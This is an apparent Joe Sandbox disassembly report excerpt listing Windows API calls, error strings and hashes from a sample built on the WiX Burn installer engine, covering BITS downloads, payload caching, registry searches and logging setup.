                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                            • API String ID: 1357844191-115096447
                                                            • Opcode ID: 8f3faa96838627fa9678870a795556b91639b8f7c749a39ba5b54ec40ea1dc4e
                                                            • Instruction ID: 9f18ece10a78feeb0a07d6c3d5211aa5817927ac6f1c5abbfe5fcc200b1ff532
                                                            • Opcode Fuzzy Hash: 8f3faa96838627fa9678870a795556b91639b8f7c749a39ba5b54ec40ea1dc4e
                                                            • Instruction Fuzzy Hash: 28B15875A4061AEFDB11EF68C881F55BBA1FF08710F148269ED18EB352CB32E811DB91
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0089DE61
                                                            Strings
                                                            • Invalid BITS engine URL: %ls, xrefs: 0089DE83
                                                            • Failed while waiting for BITS download., xrefs: 0089E012
                                                            • Failed to create BITS job., xrefs: 0089DEF0
                                                            • Failed to copy download URL., xrefs: 0089DEA8
                                                            • Failed to complete BITS job., xrefs: 0089E00B
                                                            • Failed to create BITS job callback., xrefs: 0089DF74
                                                            • Falied to start BITS job., xrefs: 0089E019
                                                            • Failed to set credentials for BITS job., xrefs: 0089DF0F
                                                            • Failed to download BITS job., xrefs: 0089DFF8
                                                            • bitsengine.cpp, xrefs: 0089DE77, 0089DF6A
                                                            • Failed to add file to BITS job., xrefs: 0089DF2E
                                                            • Failed to initialize BITS job callback., xrefs: 0089DF82
                                                            • Failed to set callback interface for BITS job., xrefs: 0089DF99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                            • API String ID: 1659193697-2382896028
                                                            • Opcode ID: 463f447d574b690db64230819cab358255a65a59ad2ff7bfdd42e8e8afe348fe
                                                            • Instruction ID: e3b8a177dbcd3963fdc9c8cc0d30ed426789a9df212d60b9ced92fbd5f589b2e
                                                            • Opcode Fuzzy Hash: 463f447d574b690db64230819cab358255a65a59ad2ff7bfdd42e8e8afe348fe
                                                            • Instruction Fuzzy Hash: 0A61B131A40725EBCF11AB98C885E6E7FA4FF08720B194256FC05EB351DBB4DD009B95
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087BCE5
                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0087BDF2
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0087BDFC
                                                            • WaitForInputIdle.USER32(?,?), ref: 0087BE50
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0087BE9B
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0087BEA8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                            • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                            • API String ID: 155678114-2737401750
                                                            • Opcode ID: 9a78f184cd9df29e9887f0e0d98ed7e8a2444130d3caa8a70e6b8f88cf44f6cb
                                                            • Instruction ID: 731407913fa934389fbdd5c677f20d6ac6a3b5a2483b782358432e702b54684a
                                                            • Opcode Fuzzy Hash: 9a78f184cd9df29e9887f0e0d98ed7e8a2444130d3caa8a70e6b8f88cf44f6cb
                                                            • Instruction Fuzzy Hash: FF514C72D0061ABBCF22AF98CC41AEEBB7AFF14300B148565FA18F2215D731DE509B91
                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00896F28,?), ref: 00896A0B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896A18
                                                            • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896A60
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896A6C
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896AA6
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896AB0
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00896B67
                                                            • CloseServiceHandle.ADVAPI32(?), ref: 00896B71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                            • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                            • API String ID: 971853308-301359130
                                                            • Opcode ID: 49a04b49afe2b97c548a6557e0cbd8511f5b16106b20a4bb22b9023f6912af28
                                                            • Instruction ID: be53e5b14c244541d9e1e8fef91736e6a1600659c2cd6b4dc14f65b64e91297b
                                                            • Opcode Fuzzy Hash: 49a04b49afe2b97c548a6557e0cbd8511f5b16106b20a4bb22b9023f6912af28
                                                            • Instruction Fuzzy Hash: 89418572A407359BDB11BAA88C85EAEB7F4FF04720B198139FD15FB241F674DC1186A1
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A2B3
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A30E
                                                            • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0087A32F
                                                            • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0087A405
                                                            Strings
                                                            • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0087A3DD
                                                            • search.cpp, xrefs: 0087A360
                                                            • Failed to format value string., xrefs: 0087A319
                                                            • Failed to format key string., xrefs: 0087A2BE
                                                            • Failed to open registry key. Key = '%ls', xrefs: 0087A3C7
                                                            • Failed to set variable., xrefs: 0087A3BD
                                                            • Failed to query registry key value., xrefs: 0087A36A
                                                            • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0087A37A
                                                            • Registry key not found. Key = '%ls', xrefs: 0087A396
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16$CloseQueryValue
                                                            • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                            • API String ID: 2702208347-46557908
                                                            • Opcode ID: 56341862546df3a1bac90757fcdf0b775c191c9ff1ed601c513e93c401157a1a
                                                            • Instruction ID: 9709dd59169475ea40906bc1efd4e1d17840bcaacbcf389a9b5d7bf389644444
                                                            • Opcode Fuzzy Hash: 56341862546df3a1bac90757fcdf0b775c191c9ff1ed601c513e93c401157a1a
                                                            • Instruction Fuzzy Hash: EE41C532D40128BFDB169E98CC46FEFBA64FB44710F108261B818F6396D675DE10AB92
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0087BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B210
                                                            • GetLastError.KERNEL32(?,0087BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B21C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandleLastModule
                                                            • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                            • API String ID: 4242514867-926796631
                                                            • Opcode ID: 142f07a783171b6401674c4d14f4f5a884130ea43f088fb0c76c210b2f7ea4be
                                                            • Instruction ID: c91a38466e428638f73cbfe8574e9413f98d3f09448bc242a3c15042353f8c0f
                                                            • Opcode Fuzzy Hash: 142f07a783171b6401674c4d14f4f5a884130ea43f088fb0c76c210b2f7ea4be
                                                            • Instruction Fuzzy Hash: AD410B32281610A7C72115558C86FEE2652FF85B31F65C039F919EF387D7BDC84292E6
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0087699B
                                                            • GetLastError.KERNEL32 ref: 008769A5
                                                            • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 008769E8
                                                            • GetLastError.KERNEL32 ref: 008769F2
                                                            • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00876B03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                            • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                            • API String ID: 3057421322-109962352
                                                            • Opcode ID: 356a223c6f2e2e4cf80a6f1c91cdb79e4506fa5387ad2c8388cee6f5e7ebb2c1
                                                            • Instruction ID: 46c54dec24b97ee2c7b3435849179361e696858f56f721b9387849989cae7b53
                                                            • Opcode Fuzzy Hash: 356a223c6f2e2e4cf80a6f1c91cdb79e4506fa5387ad2c8388cee6f5e7ebb2c1
                                                            • Instruction Fuzzy Hash: F941B432D416399BDB219B688C49BEABBA4FB08710F008195E90CF6285F774CE94CF91
                                                            APIs
                                                            • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00875466,?,?,?,?), ref: 00874920
                                                            • GetLastError.KERNEL32(?,?,?,00875466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00874931
                                                            • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00874A6E
                                                            • CloseHandle.KERNEL32(?,?,?,?,00875466,?,?,?,?,?,?,?,?,?,?,?), ref: 00874A77
                                                            Strings
                                                            • Failed to allocate thread local storage for logging., xrefs: 0087495F
                                                            • Failed to create the message window., xrefs: 008749CC
                                                            • Failed to set elevated pipe into thread local storage for logging., xrefs: 008749A8
                                                            • engine.cpp, xrefs: 00874955, 0087499E
                                                            • comres.dll, xrefs: 008749DD
                                                            • Failed to connect to unelevated process., xrefs: 00874916
                                                            • Failed to pump messages from parent process., xrefs: 00874A42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AllocCloseErrorHandleLastMutexRelease
                                                            • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                            • API String ID: 687263955-1790235126
                                                            • Opcode ID: 41f8e748063d1aac38088def47102cdbcd4669d57ae828bd9aed1297cec618f0
                                                            • Instruction ID: 7f02f91606418374336860eff10c7fe711d8f7e599a8a7642dd592262da04767
                                                            • Opcode Fuzzy Hash: 41f8e748063d1aac38088def47102cdbcd4669d57ae828bd9aed1297cec618f0
                                                            • Instruction Fuzzy Hash: 4C419373940626BBC712ABA8CC45EEFFB6CFF04710F004226BA19E2250DB74E95087E1
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00883BA2
                                                            • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00883BAC
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00883C15
                                                            • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00883C1C
                                                            • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 00883CA6
                                                            Strings
                                                            • %u\, xrefs: 00883C36
                                                            • logging.cpp, xrefs: 00883BD0
                                                            • Failed to get length of temp folder., xrefs: 00883C06
                                                            • Failed to get temp folder., xrefs: 00883BDA
                                                            • Failed to format session id as a string., xrefs: 00883C4A
                                                            • crypt32.dll, xrefs: 00883B61
                                                            • Failed to get length of session id string., xrefs: 00883C71
                                                            • Failed to copy temp folder., xrefs: 00883CCF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                            • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                            • API String ID: 2407829081-3274134579
                                                            • Opcode ID: 19065652d6eacbcae8493a5e2d7f68b5a0a246659a46e4ada6bc0bfb172e1688
                                                            • Instruction ID: 4e31252d3bd10afeb5891841fe2acf84bf803e0e47cd464ff9f02f1cdafb0270
                                                            • Opcode Fuzzy Hash: 19065652d6eacbcae8493a5e2d7f68b5a0a246659a46e4ada6bc0bfb172e1688
                                                            • Instruction Fuzzy Hash: A7419E72D8123DABCB21AB588C49FDAB778FB10B10F1046A5F918F7241DA709F858BD1
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00877FC2
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008781EA
                                                            Strings
                                                            • feclient.dll, xrefs: 0087809D, 008780F3, 00878134
                                                            • Failed to get version., xrefs: 0087819B
                                                            • Unsupported variable type., xrefs: 008781A7
                                                            • Failed to write variable name., xrefs: 008781D1
                                                            • Failed to write variable count., xrefs: 00877FDD
                                                            • Failed to write literal flag., xrefs: 008781C3
                                                            • Failed to get string., xrefs: 008781B5
                                                            • Failed to write variable value as number., xrefs: 00878194
                                                            • Failed to get numeric., xrefs: 008781BC
                                                            • Failed to write variable value as string., xrefs: 008781AE
                                                            • Failed to write included flag., xrefs: 008781D8
                                                            • Failed to write variable value type., xrefs: 008781CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                            • API String ID: 3168844106-2118673349
                                                            • Opcode ID: 6af2ebdc8a956ac914b38faf104ce4bc6806461c4ed39c30426d0d3f151b6770
                                                            • Instruction ID: 25bdf0523642fbdd5bd3a056b3f9a7e248c5ee5baba9fda076916c9aba9cd70a
                                                            • Opcode Fuzzy Hash: 6af2ebdc8a956ac914b38faf104ce4bc6806461c4ed39c30426d0d3f151b6770
                                                            • Instruction Fuzzy Hash: DB71C232D4461AEFCB129EA8C848AAE7BA4FF04314F50C121F918E7255DB34DD169BB1
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0088A843,00000000,00000000,00000000,?,00000000), ref: 008897CD
                                                            • GetLastError.KERNEL32(?,0088A843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008897DD
                                                              • Part of subcall function 008B4102: Sleep.KERNEL32(?,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00874DBC), ref: 008B4119
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008898E9
                                                            Strings
                                                            • cache.cpp, xrefs: 00889801
                                                            • Moving, xrefs: 0088987F
                                                            • Failed to open payload in working path: %ls, xrefs: 0088980C
                                                            • Failed to verify payload hash: %ls, xrefs: 00889875
                                                            • Failed to copy %ls to %ls, xrefs: 008898D7
                                                            • Failed to verify payload signature: %ls, xrefs: 00889838
                                                            • Failed to move %ls to %ls, xrefs: 008898C1
                                                            • %ls payload from working path '%ls' to path '%ls', xrefs: 00889894
                                                            • Copying, xrefs: 00889888, 00889893
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLastSleep
                                                            • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                            • API String ID: 1275171361-1604654059
                                                            • Opcode ID: 543cb95730e2c3875e5a6239a3ada480e790f30719ab419f7ae982b87fbe1e42
                                                            • Instruction ID: fd7df06c41f1a36852807c82eca115bac0aa5fe469c808c413d2280fcc94bb41
                                                            • Opcode Fuzzy Hash: 543cb95730e2c3875e5a6239a3ada480e790f30719ab419f7ae982b87fbe1e42
                                                            • Instruction Fuzzy Hash: 5731A7729406667BDA2236594C46F7B2A28FF42B50F090135FD55FB391D664DC009BE2
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 008765FC
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00876628
                                                            • GetLastError.KERNEL32 ref: 00876636
                                                            • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0087666E
                                                            • GetLastError.KERNEL32 ref: 00876678
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008766BB
                                                            • GetLastError.KERNEL32 ref: 008766C5
                                                            Strings
                                                            • variable.cpp, xrefs: 0087665A, 0087669C
                                                            • Failed to backslash terminate system folder., xrefs: 00876708
                                                            • Failed to get 32-bit system folder., xrefs: 008766A6
                                                            • Failed to set system folder variant value., xrefs: 00876724
                                                            • Failed to get 64-bit system folder., xrefs: 00876664
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                            • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                            • API String ID: 325818893-1590374846
                                                            • Opcode ID: 13c2c9c3ef4081e0837b02103377cb8bdb2eac433e7e6039b4bce6edb88e16c3
                                                            • Instruction ID: df7da1d0c8c6ad06b550567f43ad9c9e914521a722462562f580a185ac48da9b
                                                            • Opcode Fuzzy Hash: 13c2c9c3ef4081e0837b02103377cb8bdb2eac433e7e6039b4bce6edb88e16c3
                                                            • Instruction Fuzzy Hash: 79311672D41A39A7CB30A7548C89B9A7768FF10790F058265BD18FB285F774DD408AE2
                                                            APIs
                                                              • Part of subcall function 00883AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00883FB5,feclient.dll,?,00000000,?,?,?,00874B12), ref: 00883B42
                                                            • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?,?,008BB488,?,00000001,00000000,00000000), ref: 0088404C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseSleep
                                                            • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                            • API String ID: 2834455192-2673269691
                                                            • Opcode ID: 78b7e6f7b36b29ab729974a9477754f2eef1ca4fd3ae4e710336e647bab2a4fc
                                                            • Instruction ID: 585d1d9fc14c8b24daf90b09a856f8249fc95d4d109c0b056ca6b3c063ba3f72
                                                            • Opcode Fuzzy Hash: 78b7e6f7b36b29ab729974a9477754f2eef1ca4fd3ae4e710336e647bab2a4fc
                                                            • Instruction Fuzzy Hash: C561C472A00A17BBDB25BF68CC46B6B7BB8FF10740B049159F901DB241EB71ED9087A1
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000001,?,00000000,00875445,00000006,?,008782B9,?,?,?,00000000,00000000,00000001), ref: 00876DC8
                                                              • Part of subcall function 008756A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00876595,00876595,?,0087563D,?,?,00000000), ref: 008756E5
                                                              • Part of subcall function 008756A9: GetLastError.KERNEL32(?,0087563D,?,?,00000000,?,?,00876595,?,00877F02,?,?,?,?,?), ref: 00875714
                                                            • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,008782B9), ref: 00876F59
